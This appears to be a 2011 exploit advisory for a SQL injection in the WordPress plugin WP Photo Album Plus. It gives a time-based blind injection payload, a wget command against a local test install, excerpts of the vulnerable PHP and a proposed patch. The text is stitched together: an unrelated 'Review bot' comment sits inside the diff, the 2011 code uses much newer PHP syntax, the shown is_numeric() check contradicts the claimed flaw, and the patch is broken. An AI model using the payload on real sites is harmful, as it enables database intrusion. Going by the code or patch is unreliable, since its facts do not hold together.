# Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
# Date: 2011-10-14
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
# Version: 4.1.1 (tested)
---------------
PoC (POST data)
---------------
http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
e.g.
wget http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
---------------
Vulnerable code
---------------
Line 490 of wppa-functions.php:
// Album id and cover flag are taken straight from the query string via
// wppa_get_get(); nothing here validates them — the is_numeric() check on
// $id happens later, just before the database query is built.
if (($occur == $ref_occur) && wppa_get_get('album')) {
$id = wppa_get_get('album');
$wppa['is_cover'] = wppa_get_get('cover');
}
...
...
if (is_numeric($id)) {
if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id);
else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id);
$albums = $wpdb->get_results($q, 'ARRAY_A');
Line 3170 of wppa-functions.php:
/**
 * Read a WPPA request parameter from the query string.
 *
 * Looks up the "wppa-" prefixed key first, then the bare legacy key, and
 * falls back to $default when neither is present. The value is returned
 * exactly as it arrived in $_GET: no validation, type coercion or escaping
 * is performed here, so a caller that feeds the result into a database
 * query must check it (e.g. with is_numeric()) before use.
 *
 * @param string $index   Parameter name without the "wppa-" prefix.
 * @param mixed  $default Value returned when the parameter is absent.
 * @return mixed Raw request value, or $default.
 */
function wppa_get_get($index, $default = false) {
    // New-style key wins over the legacy unprefixed one; "??" has the same
    // "set and not null" semantics as the isset() checks it replaces.
    return $_GET['wppa-' . $index] ?? $_GET[$index] ?? $default;
}
---------------
Patch
---------------
*** ./wppa-functions.php 2011-10-14 19:15:11.574775456 -0400
--- ./wppa-functions.php.new 2011-10-14 19:13:14.735784321 -0400
***************
*** 506,513 ****
// Top-level album has no cover
if ($id == '0') $wppa['is_cover'] = '0';
-
// Do the query
if (is_numeric($id)) {
if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id);
else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id);
--- 506,513 ----
// Top-level album has no cover
if ($id == '0') $wppa['is_cover'] = '0';
// Do the query
+ $id=substr($id,3);
if (is_numeric($id)) {
if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id);
else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id);
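Review bot: The added line `$id=substr($id,3);` is not a validation step — it unconditionally drops the first three characters of the album id, so an ordinary value such as `1` or `42` becomes an empty string, fails the `is_numeric($id)` check on the next line, and no album query runs at all. If the intent is to guarantee an integer before the query, coerce and use an integer placeholder instead: `$id = (int) $id;` together with `%d` in place of `%s` in both `$wpdb->prepare()` calls. The enclosing function begins and ends outside this hunk, so how `$id` is used afterwards is not visible; if a non-numeric id should be rejected rather than coerced to 0, a guard before the query is the better form.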
***************
*** 3384,3387 ****
global $wppa;
if ( $wppa['any'] ) echo $wppa['searchresults'];
! }
\ No newline at end of file
--- 3384,3387 ----
global $wppa;
if ( $wppa['any'] ) echo $wppa['searchresults'];
! }